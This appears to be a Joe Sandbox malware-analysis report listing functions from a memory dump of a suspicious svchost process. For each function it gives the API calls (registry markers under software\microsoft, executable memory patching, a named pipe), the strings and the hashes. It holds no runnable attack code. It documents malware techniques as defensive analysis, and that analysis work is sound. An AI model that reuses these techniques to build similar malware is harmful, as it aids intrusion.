Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Path$Process$BackslashExistsFileFolderFreeValidatelstrcpynmemset
String ID: 7d2de60fa
API String ID: 780088666-4253731324
Opcode ID: 47afdaadcf33957278c797cc9d22dbdd61c09cfa1bb999e8302c62257340366a
Instruction ID: 874ce55ae577560d7386450904837d24a7f509fa39a457052b45d97fe50e9868
Opcode Fuzzy Hash: 47afdaadcf33957278c797cc9d22dbdd61c09cfa1bb999e8302c62257340366a
Instruction Fuzzy Hash: C1110671F8425967EB2166259C09FDBBBECDF80B05F044694F98DEB1C0DEE099858BD0

Function 02C832F0 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 125registrymemoryCOMMON

Download Yara Rule

APIs

IsUserAnAdmin.SHELL32 ref: 02C832FA
memset.MSVCRT ref: 02C83330
RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,?,?,?,00000000), ref: 02C83357
RegQueryValueExA.ADVAPI32(?,00000001,00000000,00000001,00000000,00000104,?,?,00000000), ref: 02C8337A
GetProcessHeap.KERNEL32(00000008,00000015,?,?,00000000), ref: 02C833ED
HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 02C833F4
memset.MSVCRT ref: 02C83404
RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 02C83432

Strings

software\microsoft, xrefs: 02C8334D

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Heapmemset$AdminAllocCloseOpenProcessQueryUserValue
String ID: software\microsoft
API String ID: 1484339481-3673152959
Opcode ID: ffc6f798f5a69eaf18ca008539c899796092b0a2bde6652e46702e492edf175d
Instruction ID: 23968d54473004be1a826ad79e5164d9663e5341a45f5565242fb56e15f19d55
Opcode Fuzzy Hash: ffc6f798f5a69eaf18ca008539c899796092b0a2bde6652e46702e492edf175d
Instruction Fuzzy Hash: A141C832E001999BDB26DA649D09FDABBB89FC1F08F0491D5ED44A7100DB70DB058BA1

Function 02C73830 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 86COMMON

Download Yara Rule

APIs

SymGetModuleBase.DBGHELP(00000000,?,?,?), ref: 02C73889
SymGetModuleInfo.DBGHELP(00000000,00000000,0000023C), ref: 02C7389C
SymGetSymFromAddr.DBGHELP(00000000,?,?,00000018), ref: 02C738B3
_snprintf.MSVCRT ref: 02C738DD
_snprintf.MSVCRT ref: 02C73901

Strings

%s!%s + 0x%04x, xrefs: 02C738D2
%s!0x%08x, xrefs: 02C738F6
unknown!0x%08x, xrefs: 02C73916

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Module_snprintf$AddrBaseFromInfo
String ID: %s!%s + 0x%04x$%s!0x%08x$unknown!0x%08x
API String ID: 844136142-2194319270
Opcode ID: debc5e9f8d230d550c85161a7568315a262fbd6eb95dd6f97c25237b9e36c290
Instruction ID: ee176164c65198b71dffdc2ec012dc55a2265955e45dc6228db0b5408bef8a28
Opcode Fuzzy Hash: debc5e9f8d230d550c85161a7568315a262fbd6eb95dd6f97c25237b9e36c290
Instruction Fuzzy Hash: 0F212372A00198ABE7229E48DC84FFA73ACEF84700F0481D9F809A7140E7719B58DBA1

Function 02C822C0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 76registryCOMMON

Download Yara Rule

APIs

IsUserAnAdmin.SHELL32 ref: 02C822C8
RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,?,?,02C859A4), ref: 02C822FF
RegQueryValueExA.ADVAPI32(?,7D2DE753a,00000000,02C859A4,00000000,?,?,02C859A4), ref: 02C8231C
RegCloseKey.ADVAPI32(?,?,02C859A4), ref: 02C82326
RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?,?,02C859A4), ref: 02C82359
RegQueryValueExA.KERNEL32(?,7D2DE753a,00000000,?,00000000,02C859A4,?,02C859A4), ref: 02C82376
RegCloseKey.ADVAPI32(?,?,02C859A4), ref: 02C82380

Strings

7D2DE753a, xrefs: 02C82316, 02C82370
software\microsoft, xrefs: 02C822E8, 02C82342

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue$AdminUser
String ID: 7D2DE753a$software\microsoft
API String ID: 2113243795-1415539779
Opcode ID: 922c61293b1bee8923d5a58eb8ce59a7f9aa4d8ab9767407fe72cab3fee6937f
Instruction ID: 017e78e4adb00e4484c9c3d064383ffddcd4098467c60a2a5b0605639de4f87d
Opcode Fuzzy Hash: 922c61293b1bee8923d5a58eb8ce59a7f9aa4d8ab9767407fe72cab3fee6937f
Instruction Fuzzy Hash: FD214175E40249FBEB01DBA4DC89FEEBBBCEF44704F104A99E905E7140E7B4A6049B54

Function 02C88B10 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 76registryCOMMON

Download Yara Rule

APIs

IsUserAnAdmin.SHELL32 ref: 02C88B18
RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,02C88CD7), ref: 02C88B4F
RegQueryValueExA.ADVAPI32(02C88CD7,7d2de71ba,00000000,?,00000000,?), ref: 02C88B6C
RegCloseKey.ADVAPI32(02C88CD7), ref: 02C88B76
RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?), ref: 02C88BA9
RegQueryValueExA.KERNEL32(?,7d2de71ba,00000000,?,00000000,?), ref: 02C88BC6
RegCloseKey.ADVAPI32(?), ref: 02C88BD0

Strings

software\microsoft, xrefs: 02C88B38, 02C88B92
7d2de71ba, xrefs: 02C88B66, 02C88BC0

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue$AdminUser
String ID: 7d2de71ba$software\microsoft
API String ID: 2113243795-3660629452
Opcode ID: 4493a33fad6a26744ab4a4528b16f271d32d37bc836a139fb56fbdcd00241282
Instruction ID: b7628371782cf1d20c53189bd053dcf2845de122ac2e73c2e3bb5e58df35ebe3
Opcode Fuzzy Hash: 4493a33fad6a26744ab4a4528b16f271d32d37bc836a139fb56fbdcd00241282
Instruction Fuzzy Hash: 28211DB5E4020DBBEB01DBA4DD85FEEBBB8EF88704F104699E501E7140E7B4A6058B94

Function 02C73430 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 76registryCOMMON

Download Yara Rule

APIs

IsUserAnAdmin.SHELL32 ref: 02C73438
RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,?), ref: 02C7346F
RegQueryValueExA.ADVAPI32(?,7d2de689a,00000000,?,00000000,?), ref: 02C7348C
RegCloseKey.ADVAPI32(?), ref: 02C73496
RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?), ref: 02C734C9
RegQueryValueExA.KERNEL32(?,7d2de689a,00000000,?,00000000,?), ref: 02C734E6
RegCloseKey.ADVAPI32(?), ref: 02C734F0

Strings

7d2de689a, xrefs: 02C73486, 02C734E0
software\microsoft, xrefs: 02C73458, 02C734B2

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue$AdminUser
String ID: 7d2de689a$software\microsoft
API String ID: 2113243795-247576912
Opcode ID: 59d1c569bf5b2a2a0fe74698599c5955ffa94a4e28bbbf7d3ca57d0a61403491
Instruction ID: 110012369a30d37c7ac43815baab101445165a89ae5d46bcb92c0ad8cd912cb6
Opcode Fuzzy Hash: 59d1c569bf5b2a2a0fe74698599c5955ffa94a4e28bbbf7d3ca57d0a61403491
Instruction Fuzzy Hash: C8214F75E40249FBEB15CBA4DC85FEEBBB8EF48700F104699E601E7140E7B4A6059B94

Function 02C97530 Relevance: 15.4, APIs: 8, Strings: 2, Instructions: 394COMMON

Download Yara Rule

Strings

UT, xrefs: 02C977D9
/, xrefs: 02C975C1

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID:
String ID: /$UT
API String ID: 0-1626504983
Opcode ID: 8cd8e28024db2c1f05ee53f4d77104ea95a04d678365f7f3ae8722546a6db83a
Instruction ID: 0b87090530d4187549a361d6e0166cc7633a992d6cb982bd84a68858742b5c18
Opcode Fuzzy Hash: 8cd8e28024db2c1f05ee53f4d77104ea95a04d678365f7f3ae8722546a6db83a
Instruction Fuzzy Hash: 0EF190B1A152588BCF25CF69D8847EDFBB5EF84304F1485DAE808AB241D7719B88CF91

Function 02C97B50 Relevance: 15.1, APIs: 10, Instructions: 97memoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00004070,?,00000000,75AF5CE0,?,02C82840,?), ref: 02C97B63
RtlAllocateHeap.NTDLL(00000000,?,02C82840,?), ref: 02C97B66
memset.MSVCRT ref: 02C97B7B
CreateFileA.KERNEL32(02C82840,40000000,00000003,00000000,00000002,00000080,00000000,?,02C82840,?), ref: 02C97BD2
GetProcessHeap.KERNEL32(00000000,00000000,?,02C82840,?), ref: 02C97BF5
HeapValidate.KERNEL32(00000000,?,02C82840,?), ref: 02C97BF8
GetProcessHeap.KERNEL32(00000000,00000000,?,02C82840,?), ref: 02C97C04
HeapFree.KERNEL32(00000000,?,02C82840,?), ref: 02C97C07
GetProcessHeap.KERNEL32(00000008,00000010,?,02C82840,?), ref: 02C97C1A
HeapAlloc.KERNEL32(00000000,?,02C82840,?), ref: 02C97C1D

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocAllocateCreateFileFreeValidatememset
String ID:
API String ID: 529598968-0
Opcode ID: f9ec8668f9f27af3536a84382f41d06f747a31da70293c8ab9c2a57ac8ed06ec
Instruction ID: a6b2414cb3c24528592f7f4772f15661689a7160a35fdfdeb1d03fa4dc6205d6
Opcode Fuzzy Hash: f9ec8668f9f27af3536a84382f41d06f747a31da70293c8ab9c2a57ac8ed06ec
Instruction Fuzzy Hash: E9315EF19467449FDB319F669C88B12FBE8FF84714F00892EE28A97641C370A544CBA1

Function 02C831A0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 114registrymemoryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02C831D4
RegOpenKeyExA.KERNEL32(00000104,software\microsoft,00000000,00000101,80000002,?,76230F10,00000000), ref: 02C831F7
RegQueryValueExA.KERNEL32(80000002,?,00000000,00000001,00000000,00000104,?,76230F10,00000000), ref: 02C8321A
GetProcessHeap.KERNEL32(00000008,00000015,?,76230F10,00000000), ref: 02C8328D
HeapAlloc.KERNEL32(00000000,?,76230F10,00000000), ref: 02C83294
memset.MSVCRT ref: 02C832A4
RegCloseKey.ADVAPI32(80000002,?,76230F10,00000000), ref: 02C832D2

Strings

software\microsoft, xrefs: 02C831F1

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Heapmemset$AllocCloseOpenProcessQueryValue
String ID: software\microsoft
API String ID: 4043890984-3673152959
Opcode ID: 938e5983cb5dc41a3770d10e2b755d0cd0f9b5e85c28e557abdbd5e662052f64
Instruction ID: da9891e3be98d4c1a52e2c2ed95cd7b6662a5d391b76b87e312ac4960b0d8925
Opcode Fuzzy Hash: 938e5983cb5dc41a3770d10e2b755d0cd0f9b5e85c28e557abdbd5e662052f64
Instruction Fuzzy Hash: 7F31C832E042DDABCB22DB649C08BDB7BB8AFC5B08F0586D4ED5497101D770DB498B91

Function 02C89230 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72memorysynchronizationsleepCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000003E8), ref: 02C8924B
VirtualProtect.KERNEL32(?,00000018,00000040,?), ref: 02C89298
GetCurrentProcess.KERNEL32(00000000,00000000), ref: 02C892C7
FlushInstructionCache.KERNEL32(00000000), ref: 02C892CE
VirtualProtect.KERNEL32(?,00000018,?,?), ref: 02C892E2
ReleaseMutex.KERNEL32(?), ref: 02C892F9
Sleep.KERNEL32(00000064), ref: 02C89301

Strings

P0#v, xrefs: 02C892F9

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: ProtectVirtual$CacheCurrentFlushInstructionMutexObjectProcessReleaseSingleSleepWait
String ID: P0#v
API String ID: 842647815-3387790918
Opcode ID: 61f986011ddaad9f9f5d0b6dbd3188fa6f5d00b2d0960e879eb0c59615c09e50
Instruction ID: 776aa29ac6adfd7372a221d914691c6ac6f9cd4e1b74a4149aa9d8fb52a3ef11
Opcode Fuzzy Hash: 61f986011ddaad9f9f5d0b6dbd3188fa6f5d00b2d0960e879eb0c59615c09e50
Instruction Fuzzy Hash: 4A215A75A40201EFD725DF55D888F66B7A9FB88714F04CA48E60697790CB30F954CB91

Function 02C88BF0 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 39registryCOMMON

Download Yara Rule

APIs

IsUserAnAdmin.SHELL32 ref: 02C88BF7
GetTickCount.KERNEL32 ref: 02C88C09
RegOpenKeyExA.KERNEL32(?,software\microsoft,00000000,00000102,?,?,?,?,02C88DC2), ref: 02C88C23
RegSetValueExA.KERNEL32(?,7d2de71ba,00000000,00000004,?,00000004,software\microsoft,00000000,00000102,?,?,?,?,02C88DC2), ref: 02C88C40
RegFlushKey.ADVAPI32(?,?,?,?,02C88DC2), ref: 02C88C4A
RegCloseKey.ADVAPI32(?,?,?,?,02C88DC2), ref: 02C88C54

Strings

software\microsoft, xrefs: 02C88C1D
7d2de71ba, xrefs: 02C88C3A

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: AdminCloseCountFlushOpenTickUserValue
String ID: 7d2de71ba$software\microsoft
API String ID: 287100044-3660629452
Opcode ID: af3d3c3d917ee86980ea8899395568b370373d70d68ad8fb6a81ea8d3a2bf517
Instruction ID: b19634f42ef7c3292fa34f6bbd09172dabb954f0f2e18e5e67ba2428723a9bd0
Opcode Fuzzy Hash: af3d3c3d917ee86980ea8899395568b370373d70d68ad8fb6a81ea8d3a2bf517
Instruction Fuzzy Hash: FAF03175D80258FBD701DBA0AD49F9A7B3CAF04701F104795FA06A3180D6709A1587A4

Function 02C93E40 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 118COMMON

Download Yara Rule

APIs

GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 02C93E6F
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00FFAAFF,00000000,00000000,00000000,00000000), ref: 02C93EA8
_snprintf.MSVCRT ref: 02C93F13
_snprintf.MSVCRT ref: 02C93F76

Strings

7D2DE787a, xrefs: 02C93EE1, 02C93F12
82C3182D, xrefs: 02C93F43, 02C93F75
1234567890QWERTYUIOPASDFGHJKLZXCVBNM, xrefs: 02C93E51

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: _snprintf$DirectoryInformationSystemVolumeWindows
String ID: 1234567890QWERTYUIOPASDFGHJKLZXCVBNM$7D2DE787a$82C3182D
API String ID: 2823094833-3282646426
Opcode ID: 56d286c8fbf1fcafa5865725b26843ec90a64cb741d60294705bbd3a10ff8e41
Instruction ID: e0cbaeed9ecfb537269936f1a9088f204baa542f2f80854772de925ea2260573
Opcode Fuzzy Hash: 56d286c8fbf1fcafa5865725b26843ec90a64cb741d60294705bbd3a10ff8e41
Instruction Fuzzy Hash: FE4125B2E00199ABDB15CB688D88BEEF7FEEF94300F1502E4E545AB280D7716B458780

Function 02C848B0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 51registryCOMMON

Download Yara Rule

APIs

IsUserAnAdmin.SHELL32 ref: 02C848D8
RegQueryValueExA.KERNEL32(00000000,7d2de06ea,00000000,00000000,00000000,?), ref: 02C8491A
RegCloseKey.ADVAPI32(00000000), ref: 02C84924
RegOpenKeyExA.KERNEL32(-80000001), ref: 02C848EA

Part of subcall function 02C73430: IsUserAnAdmin.SHELL32 ref: 02C73438
Part of subcall function 02C73430: RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,?), ref: 02C7346F
Part of subcall function 02C73430: RegQueryValueExA.ADVAPI32(?,7d2de689a,00000000,?,00000000,?), ref: 02C7348C
Part of subcall function 02C73430: RegCloseKey.ADVAPI32(?), ref: 02C73496
Part of subcall function 02C73430: RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?), ref: 02C734C9
Part of subcall function 02C73430: RegQueryValueExA.KERNEL32(?,7d2de689a,00000000,?,00000000,?), ref: 02C734E6
Part of subcall function 02C73430: RegCloseKey.ADVAPI32(?), ref: 02C734F0

Strings

7D2DEFD7a, xrefs: 02C84902, 02C84918
7d2de06ea, xrefs: 02C848FB
software\microsoft, xrefs: 02C848CC

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue$AdminUser
String ID: 7D2DEFD7a$7d2de06ea$software\microsoft
API String ID: 2113243795-903619812
Opcode ID: 66b96ee46b1c71e43464b0cad1529f1feb87841dee9d931c06d73110e0bc9115
Instruction ID: 3be5ce622da499e016b5904651f4a545f69ed32f49199a27d74f66c8fb0bfc8c
Opcode Fuzzy Hash: 66b96ee46b1c71e43464b0cad1529f1feb87841dee9d931c06d73110e0bc9115
Instruction Fuzzy Hash: FA0152B5E90249ABDB14DBB4DC45FAE77BCEF44714F104B98F515E7180E77496008B90

Function 02C88FC0 Relevance: 12.1, APIs: 8, Instructions: 139memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,-00000008,00003000,00000040,7622F550,00000000,7693BD50,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C88FF8
memcpy.MSVCRT(?,?,00000000,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C89020
VirtualProtect.KERNEL32(00000000,?,00000040,02C8839A,?,?,?,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C890B5
VirtualProtect.KERNEL32(?,00000000,00000040,02C8839A,?,?,?,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C890CA
VirtualProtect.KERNEL32(?,00000000,02C8839A,?,?,?,00000000,00000000,?,?,?,?,?,?,02C8839A,00000000), ref: 02C890FA
VirtualProtect.KERNEL32(?,00000000,02C8839A,?,?,?,?,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C89106

Part of subcall function 02C89130: WaitForSingleObject.KERNEL32(?,000003E8,00000000,02C89113,?,?,?,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C8913C
Part of subcall function 02C89130: GetProcessHeap.KERNEL32(00000008,00000030,?,?,?,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C89146
Part of subcall function 02C89130: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C8914D
Part of subcall function 02C89130: memset.MSVCRT ref: 02C8915E
Part of subcall function 02C89130: ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C891AA

GetCurrentProcess.KERNEL32(00000000,00000000,7622F550,00000000,7693BD50,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C89117
FlushInstructionCache.KERNEL32(00000000,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C8911E

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Virtual$Protect$AllocHeapProcess$CacheCurrentFlushInstructionMutexObjectReleaseSingleWaitmemcpymemset
String ID:
API String ID: 2609073853-0
Opcode ID: 8f021d533cd75e031d93a37704bb4763fec1ccb5118302501cceb90092ad35a6
Instruction ID: 7690c3e9f1e6a4d59b50bc6c9277e97bcbfb76cd1f993ad7a093bdfbb91cb0f5
Opcode Fuzzy Hash: 8f021d533cd75e031d93a37704bb4763fec1ccb5118302501cceb90092ad35a6
Instruction Fuzzy Hash: 22410072A40216B7CB10AE788C88FBB777AEF94258F448619F94597384DB35E901C7E0

Function 02C973C0 Relevance: 10.6, APIs: 7, Instructions: 75memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0006AFB0,00000000,00000000,00000000,?,02C97874,00000000,00140B17), ref: 02C973D5
RtlAllocateHeap.NTDLL(00000000,?,02C97874,00000000,00140B17), ref: 02C973DC
memset.MSVCRT ref: 02C973EF
GetProcessHeap.KERNEL32(00000000,00000000,02C97870,?,02C97874,00000000,00140B17), ref: 02C9749E
HeapValidate.KERNEL32(00000000,?,02C97874,00000000,00140B17), ref: 02C974A1
GetProcessHeap.KERNEL32(00000000,00000000,?,02C97874,00000000,00140B17), ref: 02C974AD
RtlFreeHeap.NTDLL(00000000,?,02C97874,00000000,00140B17), ref: 02C974B0

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateFreeValidatememset
String ID:
API String ID: 219023833-0
Opcode ID: ee46b0cd924f0b3656249b19cb5aba9a251340cd2f2c060f71cc093169004b01
Instruction ID: bcd05b34dfdb7e001c00c32e838f1f62bc3ad5fa811ead47d707cc04517c8152
Opcode Fuzzy Hash: ee46b0cd924f0b3656249b19cb5aba9a251340cd2f2c060f71cc093169004b01
Instruction Fuzzy Hash: 6421EFB0A017009FCB21AFA5D888ACBFFE8FF4A744B00881DE55E8B201C734A405CF92

Function 00402240 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 74filetimeCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(\\.\pipe\acsipc_server,C0000000,00000003,?,00000003,80000080,00000000,00000000), ref: 004022D6
WriteFile.KERNEL32(00000000,D48A445E,00000028,?,00000000), ref: 004022F6
GetSystemTimeAsFileTime.KERNEL32(?), ref: 004022FC
WriteFile.KERNEL32(00000000,B5CB6C63,0000001C,?,00000000), ref: 0040231A
CloseHandle.KERNEL32(00000000), ref: 0040231D

Strings

\\.\pipe\acsipc_server, xrefs: 00402265

Memory Dump Source

Source File: 00000002.00000002.3375821338.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3375821338.000000000045B000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: File$TimeWrite$CloseCreateHandleSystem
String ID: \\.\pipe\acsipc_server
API String ID: 3225117150-898603304
Opcode ID: f30bb11f5613f8d38f8c23486348982fdc31315c85d836d9b114ebf2302f727f
Instruction ID: c460779fd0431372b53d2531d074c5320f53f755a2dac54515a3a2487e8d4eb8
Opcode Fuzzy Hash: f30bb11f5613f8d38f8c23486348982fdc31315c85d836d9b114ebf2302f727f
Instruction Fuzzy Hash: DA31F4B1C0121CAFDB10DFD5D985AEEFBB8FB48314F10422AE614BB280D7B41A458F95

Function 02C737C0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 35registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000001,software\microsoft,00000000,00000102,?,?,?,02C73A91,?), ref: 02C737E0
RegSetValueExA.KERNEL32(00000000,7d2de637a,00000000,00000004,?,00000004,?,?,02C73A91,?), ref: 02C737FC
RegFlushKey.ADVAPI32(00000000,?,?,02C73A91,?), ref: 02C7380A
RegCloseKey.ADVAPI32(00000000,?,?,02C73A91,?), ref: 02C73818

Strings

7d2de637a, xrefs: 02C737F6
software\microsoft, xrefs: 02C737CF

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: CloseFlushOpenValue
String ID: 7d2de637a$software\microsoft
